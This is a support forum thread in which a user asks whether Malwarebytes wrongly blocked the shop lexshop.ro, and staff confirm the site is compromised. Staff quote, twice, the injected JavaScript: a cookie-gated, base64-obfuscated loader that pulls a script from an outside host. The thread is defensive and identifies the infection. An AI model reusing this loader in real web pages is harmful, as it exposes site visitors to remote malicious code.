https://www.lexshop.ro/ - possible false positive for Trojan

Mihnealihnea

https://www.lexshop.ro/ is blocked for trojans. I have shopped on this site before having malwarebytes and bought 2 products just fine.

INFO:

Malwarebytes
www.malwarebytes.com

-Log Details-
Protection Event Date: 12/22/20
Protection Event Time: 10:20 PM
Log File: 1d4f1dc0-4493-11eb-91cb-f07959378fa6.json

-Software Information-
Version: 4.3.0.98
Components Version: 1.0.1130
Update Package Version: 1.0.34621
License: Trial

-System Information-
CPU: x64
File System: NTFS
User: System

-Blocked Website Details-
Malicious Website: 1
, C:\Program Files (x86)\Google\Chrome\Application\chrome.exe, Blocked, -1, -1, 0.0.0, , 

-Website Data-
Category: Trojan
Domain: lexshop.ro
IP Address: 37.251.160.52
Port: 443
Type: Outbound
File: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

(end)

• Staff

Can you remove this malicious code from your website, please -

<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

• Thanks 1

4 hours ago, Dashke said:

<script type="text/javascript"> function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('<script src="'+src+'"><\/script>')} </script>

?

I am afraid I am not the owner of the site, I will contact the administrators. Meanwhile the thread can be considered solved I'd like to ask 2 more questions relating to the issue:

1. What would this malicious code do more precisely? (I'm no coder)

2. Would there be a way to access the site without triggering this code?

21 hours ago, Dashke said:

?

I have gotten in contact with the administrators of the site, and they seem to be struggling to find the location of this line of code. After viewing the source myself it would seem that it's not present there either. Could you please pinpoint the exact branch/location of the mallicious code?

• Staff
1 hour ago, Mihnealihnea said:

I have gotten in contact with the administrators of the site, and they seem to be struggling to find the location of this line of code. After viewing the source myself it would seem that it's not present there either. Could you please pinpoint the exact branch/location of the mallicious code?

Sure thing, the malicious code has been injected in this page for example -

lexshop.ro/blog/board-games-strategie-tzolkin-praetor/

Happy Holidays and all the best! :)